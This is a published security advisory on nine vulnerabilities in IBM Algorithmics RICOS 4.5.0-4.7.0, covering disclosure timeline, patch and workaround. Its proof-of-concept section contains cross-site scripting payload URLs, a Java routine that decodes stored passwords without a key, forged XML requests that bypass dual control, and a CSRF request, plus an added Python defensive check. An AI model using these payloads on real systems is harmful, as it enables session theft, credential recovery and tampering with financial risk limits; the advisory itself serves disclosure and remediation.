"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities"

Author

"SEC Consult"

Platform

jsp

Release date

2014-07-01

SEC Consult Vulnerability Lab Security Advisory < 20140630-0 >
=======================================================================
              title: Multiple severe vulnerabilities
            product: IBM Algorithmics RICOS
 vulnerable version: 4.5.0 - 4.7.0
      fixed version: 4.7.0.03
         CVE number: CVE-2014-0894
                     CVE-2014-0871
                     CVE-2014-0870
                     CVE-2014-0869
                     CVE-2014-0868
                     CVE-2014-0867
                     CVE-2014-0866
                     CVE-2014-0865
                     CVE-2014-0864
             impact: critical
           homepage: http://www-01.ibm.com/software/analytics/algorithmics/
              found: 2013-12-19
                 by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
IBM Algorithmics software enables financial institutions and corporate
treasuries to make risk-aware business decisions. Supported by a global
team of risk experts based in all major financial centers, IBM
Algorithmics solution offerings include market, credit and liquidity risk,
as well as collateral and capital management.

Source: http://www-01.ibm.com/software/analytics/algorithmics/

RICOS is a pre-deal limit management solution that is part of the Algo Suite.


Business recommendation:
------------------------
The identified vulnerabilities affect integrity and confidentiality of the
risk management system. SEC Consult does not recommend relying on RICOS as
part of risk management until a thorough security review has been performed
by security professionals. As a workaround, access should be limited to
trusted internal users only, and sample checks regarding the plausibility of
limits should be performed manually.


Vulnerability overview/description:
-----------------------------------
1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)
The Tomcat configuration discloses technical details within error messages to
the user, which allows an attacker to collect valuable data about the
environment of the solution.

2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)
The password and the username of the backend database are disclosed in
clear-text to the user of the web application. This allows attackers to
directly connect to the backend database and manipulate arbitrary data stored
in the database (e.g. limits).

3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)
Several parameters in the RICOS web front end and the Blotter are not properly
sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal
user sessions and impersonate other users while performing arbitrary actions
on behalf of the victim user.

4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)
Weak cryptographic algorithms are used to store and transfer users'
passwords, allowing an attacker to retrieve the plain-text passwords
without further knowledge of cryptographic keys.

5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 / CVSS 3.5)
Several fields of stored data within RICOS are marked as read-only in the web
application, disallowing modification of certain fields. These checks are only
performed client-side, allowing an attacker to alter arbitrary data. An
attacker can create a limit, alter the username of the created limit and
confirm the limit himself, circumventing dual control mechanisms advertised by
RICOS.

6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)
A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary
cookies for a user that clicks on a manipulated link.

7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)
The RICOS fat client submits user credentials in plain-text. An attacker with
access to the network communication can perform man-in-the-middle attacks and
steal user credentials.
This vulnerability also applies to the Blotter, where authentication is
performed unencrypted.

8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)
The RICOS fat client performs input validation only client-side. This allows
an attacker to alter arbitrary data. An attacker can create a limit, alter
the username of the created limit and confirm the limit himself, circumventing
dual control mechanisms advertised by RICOS.

9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)
The web application does not verify that requests are made only from within
the web application, allowing an attacker to trick users into performing
requests to the web application. This allows an attacker to perform tasks on
behalf of the victim user like modifying limits.


Proof of concept:
-----------------
1) Information Disclosure
The following URL causes a status 404, disclosing the Tomcat version:
https://ricos/ricos470/classes/

If control characters (i.e. \x00) are sent as part of the cookie, a stack trace
is triggered.

2) Password Disclosure
The following request sent by the client during regular communication shows the
database connection settings including the username and the password in
clear-text.

POST /ricos470/Executer HTTP/1.1
Host: ricos

...SNIP...
<i n="URN" v=""/>
<i n="SecServiceURN" v="obsv2:ricos:20100"/>
<i n="SecSource" v="LM web"/>
<i n="SecTimeout" v="7200"/>
<i n="AcsAutoReconnect" v="Y"/>
<i n="AcsFunctionLimits" v=""/>
</t>
<t n="ObServer">
<i n="UserId" v=""/>
<i n="Password" v=""/>
<i n="Host" v="ricos"/>
<i n="Port" v="20100"/>
<i n="CollectionId" v=""/>
<i n="DbName" v="RICA"/>
<i n="Location" v="RICA"/>
<i n="DbType" v="ORA"/>
<i n="Application" v="RICOS"/>
<i n="AppId" v="LM web"/>
<i n="AppDesc" v=""/>
<i n="AppVer" v="4.7.0"/>
<i n="Component" v="RICOS Gui"/>
<i n="DbUser" v="rica"/>
<i n="DbPass" v="password"/>
...SNIP...

3) Non-permanent Cross-Site Scripting
The following URLs demonstrate Cross-Site Scripting vulnerabilities:

POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1
Host: ricos

Message=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....

https://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x

https://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//

http://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y


http://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>

4) Broken Encryption
The user's password is transported frequently in requests within the application.
The following function decrypts the password without requiring any cryptographic key:

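// Prints the plain-text password recovered from an encoded string.
// Everything needed to reverse the encoding is contained in the string itself.
public static void decrypt(String string)
{
  int nRadix = 32;
  int nR2 = nRadix * nRadix / 2;
  // The first two characters are the "key", written as a base-32 number.
  String key = string.substring(0, 2);
  int nKey = Integer.parseInt(key, 32);

  // The remainder holds one password character per two base-32 digits.
  String encPw = string.substring(2, string.length());
  int y = 0;
  for (int i = 0; i < encPw.length(); i+=2)
  {
    String aktuell = encPw.substring(i,i+2);  // current two-digit group
    int new_value = Integer.parseInt(aktuell, 32);
    // Remove the position-dependent offset derived from the key.
    int character = - nKey * (y + 1) % nR2 + new_value;
    char decrypt = (char) character;
    System.out.print(decrypt);
    y = y + 1;
  }
}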

5) Manipulation of read-only data / dual control mechanism bypass
The following example illustrates how to manipulate a request so that the server
saves it on behalf of another user (only the relevant parts are shown):

<?xml version="1.0" encoding="UTF-8"?>
<ds>
  <t n="Service">
    <i n="RequestType" v="#Action"/>
    <t n="#ActionData">
      <i n="#ActionName" v="web.getmeta_udf"/>
      <i n="#Mode" v="#Sync"/>
      <i n="#Request" v="#Execute"/>
      <t n="#OutputData">
        <t n="#MapTable">
          <i n="#ResultData" v="#ResultData"/>
          <i n="#ResultTable" v="#ResultTable"/>
        </t>
      </t>
      <t n="#InputData">
        <t n="#WorkTable">
          <t n="det_limit">
            <i n="SCTYGEID" v="A"/>
[...]
            <i n="LMLCURID" v="other_user"/>
            <i n="LMEQEPSTDA" v=""/>
[...]
            <i n="MFURID" v="other_user"/>
            <i n="LMEVFL" v="N"/>
            <i n="SOLMFL" v="N"/>
[...]
                    <i n="CRURID" v="other_user"/>
                    <i n="MFTS" v=""/>
                    <i n="MFURID" v="other_user"/>
[...]
                    <i n="CRURID" v="other_user"/>
                    <i n="MFTS" v=""/>
[...]
  </t>
  <t n="Session">
    <t n="SessionData">
      <i n="LoginUser" v="other_user"/>
      <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>
[...]
        <i n="LoginUser" v="other_user"/>
        <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>
        <i n="URN" v=""/>
        <i n="SecServiceURN" v="obsv2:ricos:20100"/>
[...]
      </t>
      <t n="ObServer">
        <i n="UserId" v="other_user"/>
        <i n="Password" v=""/>
        <i n="Host" v="ricos"/>
[...]
        <i n="Prefix" v="RICA"/>
        <i n="DbSystem" v="oracle"/>
        <i n="LoginUserId" v="other_user"/>
      </t>
    </t>
  </t>
</ds>

6) Cross-Site Cookie Setting
The following URL allows setting of arbitrary cookies:

https://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content

7) Plain-text submission of passwords
Neither the fat client nor the Blotter uses HTTPS to communicate with the
backend server. Both send unencrypted credentials via HTTP during authentication.

8) Client-side Input Validation
By manipulating serialized objects that are transmitted by the fat client,
it is possible to change the name of the user who created a limit, allowing an
attacker to bypass dual control mechanisms.

9) Cross-Site Request Forgery
The following request, sent on behalf of an authenticated user, will for
example change the currency of a given deal:

POST http://ricos/ricos470/Executer HTTP/1.1
Host: ricos

<?xml version="1.0" encoding="UTF-8"?>
<ds>
  <t n="Service">
    <i n="RequestType" v="#Action"/>
    <t n="#ActionData">
      <i n="#ActionName" v="web.updrec_msp"/>
      <i n="#Mode" v="#Sync"/>
      <i n="#Request" v="#Execute"/>
      <t n="#InputData">
        <t n="#MapTable">
          <i n="#InputData" v="det_msp"/>
        </t>
        <t n="#WorkTable">
          <t n="det_msp">
            <i n="SYPMID" v="SYS-PAR-ID"/>
            <i n="CUCD" v="USD"/>
            <i n="MIGORILV" v="11"/>
            <i n="ILPLMVFL" v="Y"/>
            <i n="ILNEMVFL" v="Y"/>
            <i n="BSCUONFL" v="N"/>
            <i n="PBSCUOFL" v="N"/>
            <i n="LORICUTEFL" v="N"/>
            <i n="SYSAVAILFL" v="F"/>  
            <i n="CUSTID" v="CUSTOMER"/>
            <i n="CBNALI" v="IS-LOCATED-IN"/>
            <i n="CBNAAG" v="AUTOMATIC-GROUP"/>
            <i n="UDF1" v="Welcome to ricos 4.71"/>
          </t>
...SNIP...
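
Added example (not part of the SEC Consult advisory and not RICOS code): a server-side check for items 5 and 8 that compares every user-identity item in an Executer request body with the user the server itself authenticated, and records the creator of a limit from the session so the confirm step can enforce dual control. The names identity_mismatches, LimitLedger and session_user, the selection of identity item names, and the sample request are assumptions made for this illustration.

```python
import xml.etree.ElementTree as ET

# Item names that carry a user identity in the advisory's sample request
# (the selection is an assumption made for this example).
IDENTITY_ITEMS = {"CRURID", "MFURID", "LMLCURID",
                  "LoginUser", "UserId", "LoginUserId"}


def items(node, path=()):
    """Yield (path, name, value) for each <i n v/> item, recursing into <t> tables."""
    for child in node:
        name = child.get("n", "")
        if child.tag == "t":
            yield from items(child, path + (name,))
        elif child.tag == "i":
            yield "/".join(path + (name,)), name, child.get("v", "")


def identity_mismatches(body, session_user):
    """Return [(path, claimed_user)] for identity items that differ from
    session_user, which must come from server-side session state."""
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        raise ValueError("DTD and entity declarations are not accepted")
    root = ET.fromstring(body)
    return [(path, value) for path, name, value in items(root)
            if name in IDENTITY_ITEMS and value and value != session_user]


class LimitLedger:
    """Hypothetical server-side record of who created each limit."""

    def __init__(self):
        self._creator = {}

    def create(self, limit_id, body, session_user):
        if identity_mismatches(body, session_user):
            raise PermissionError("body claims a user other than the session user")
        # The creator is taken from the session, never from CRURID in the body.
        self._creator[limit_id] = session_user

    def confirm(self, limit_id, session_user):
        # Dual control: the confirming user must differ from the creator.
        if self._creator[limit_id] == session_user:
            raise PermissionError("creator may not confirm their own limit")
        return True


# Constructed sample shaped like the request in item 5 (not captured traffic).
FORGED = """<?xml version="1.0" encoding="UTF-8"?>
<ds>
  <t n="Service"><t n="#ActionData"><t n="#InputData"><t n="#WorkTable">
    <t n="det_limit">
      <i n="SCTYGEID" v="A"/>
      <i n="LMLCURID" v="other_user"/>
      <i n="CRURID" v="other_user"/>
      <i n="MFTS" v=""/>
    </t>
  </t></t></t></t>
  <t n="Session"><t n="SessionData">
    <i n="LoginUser" v="other_user"/>
  </t></t>
</ds>"""

if __name__ == "__main__":
    for path, user in identity_mismatches(FORGED, "alice"):
        print(f"{path}: body claims {user!r}, session user is 'alice'")
```

The LoginUser item inside the body is flagged as well: it is as client-controlled as CRURID, so it cannot serve as the reference identity.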


Vulnerable / tested versions:
-----------------------------
IBM Algorithmics RICOS 4.71


Vendor contact timeline:
------------------------
2014-01-24: Contacting vendor through psirt@vnet.ibm.com
2014-01-24: Vendor response, will likely require more than 30 days to resolve issues
            asking for acknowledgements
2014-01-24: Sending acknowledgements
2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues
2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS
2014-02-10: Providing further information on issue 1441, assumed to be a false positive
2014-02-14: Telco to clarify vulnerability details and agree on further procedure
            patches are scheduled for end of June 2014
2014-02-20: Vendor confirms issue 1441 to be a vulnerability
2014-05-27: Vendor announces that patches will be released on 2014-06-30
2014-06-26: Vendor published patches and security bulletin
            https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
2014-06-30: SEC Consult publishes the advisory


Solution:
---------
Apply patch ACLM 4.7.0.03 FP5. More information:
https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881


Workaround:
-----------
Limit access to RICOS and manually perform sample checks regarding the
plausibility of limits.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult


EOF F. Lukavsky / @2014